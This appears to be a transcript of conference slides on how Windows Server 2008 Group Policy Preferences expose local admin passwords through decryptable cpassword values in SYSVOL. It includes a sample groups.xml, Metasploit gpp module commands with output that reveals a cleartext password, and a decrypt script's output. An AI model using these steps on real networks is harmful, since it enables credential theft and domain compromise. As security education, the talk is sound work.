Server 2008 Group Policy Preferences (GPP) -And How They Get

1.  
2.     1. Server 2008 Group Policy Preferences (GPP) -And How They Get Your Domain 0wned Chris Gates Carnal0wnage Lares Consulting
3.     2. Whoami• Chris Gates (CG) – Twitter carnal0wnage – Blog carnal0wnage.attackresearch.com – Job Partner/Principal Security Consultant at Lares – Affiliations  Attack Research, Metasploit Project• Work• Previous Talks – Attack Oracle (via web) – wXf Web eXploitation Framework – Open Source Information Gathering – Attacking Oracle (via TNS) – Client-Side Attacks
4.     3. • Pretty much all of this came from the following post:• Exploiting Windows 2008 Group Policy Preferences – http://esec-pentest.sogeti.com/exploiting-windows-2008-group- policy-preferences
5.     4. What Are Group Policy Preferences• 2008 Server gave people the ability to set even more yummy things via group policy. – “Group Policy preferences, new for the Windows Server 2008 operating system, include more than 20 new Group Policy extensions that expand the range of configurable settings within a Group Policy object (GPO)” – http://technet.microsoft.com/en- us/library/cc731892%28WS.10%29.aspx• You can set all sorts of things including the local administrator password for servers and workstations • Via Local Users and Groups Extension
6.     5. Example
7.     6. Content of groups.xml<?xml version="1.0" encoding="utf-8"?><Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="MyLocalUser" image="0"changed="2011-12-26 10:21:37" uid="{A5E3F388-299C-41D2-B937-DD5E638696FF}"><Properties action="C" fullName=""description=""cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw" changeLogon="0" noChange="0"neverExpires="0" acctDisabled="0"subAuthority="" userName="MyLocalUser" /></User></Groups>
8.     7. So What• When you use the GPO to set the password it is stored “encrypted” “obscured” in a GPO XML object.• Who has to be able to see/set GPO? – All users• So, if an organization uses 2008 and the sets the local admin passwords via group policy. Any domain user has access to this XML file.• http://blogs.technet.com/b/grouppolicy/archive/2009/04/ 22/passwords-in-group-policy-preferences-updated.aspx
9.     8. So What #2• But its encrypted…obscured…whatever• Yes, with AES. And MS published the key…
10.     9. Party Time• Give that we have the AES key.• You can decrypt any password from the XML document
11.     10. Party Time• Someone made a metasploit module too (post/windows/gather/credentials/gpp)msf exploit(psexec) > use post/windows/gather/credentials/gppmsf post(gpp) > set SESSION 1SESSION => 1msf post(gpp) > exploit -j[*] Post module running as background job[*] Checking locally...msf post(gpp) > [-] Error accessing C:WINNTSYSVOLsysvol :stdapi_fs_ls: Operation failed: The system cannot find the pathspecified.[*] Enumerating Domains on the Network...[*] 1 Domain(s) found.[*] Retrieved Domain(s) DOMAIN from network[*] Enumerating domain information from the local registry...[*] Retrieved Domain(s) CIS, DEV, DOMAIN, from registry[*] Retrieved DC COMPANYINTERNAL.COM from registry[*] Enumerating DCs for DOMAIN on the network...[*] Enumerating DCs for CIS on the network...[-] No Domain Controllers found for CIS[*] Enumerating DCs for DEV on the network...
12.     11. Party Time• Someone made a metasploit module too[*] Searching for Policy Share on INTERNALDC...[+] Found Policy Share on INTERNALDC[*] Searching for Group Policy XML Files...[*] Parsing file: INTERALDCSYSVOLCOMPANYPolicies{4D545393-0DE8-4CDF-985D-0C932F3B7565}MACHINEPreferencesGroupsGroups.xml ...[+] Group Policy Credential Info Name Value ---- ----- TYPE Groups.xml USERNAME LOCALdmin PASSWORD A3$r0ck$! DOMAIN CONTROLLER INTERNLADC DOMAIN COMPANY.COM CHANGED 2011-06-22 05:38:50 NEVER_EXPIRES? 1 DISABLED 0
13.     12. Standalone ruby script• So if I didn’t mention it yet, module is slow.• Had a test where it was downloading the xml but pooping before it spit out the cleartext.• Wrote quick ruby script to decode.
14.     13. outputF:Lares>gpp-decrypt-string.rbLocal*P4ssword!
15.     14. Questions?Chris Gates@carnal0wnage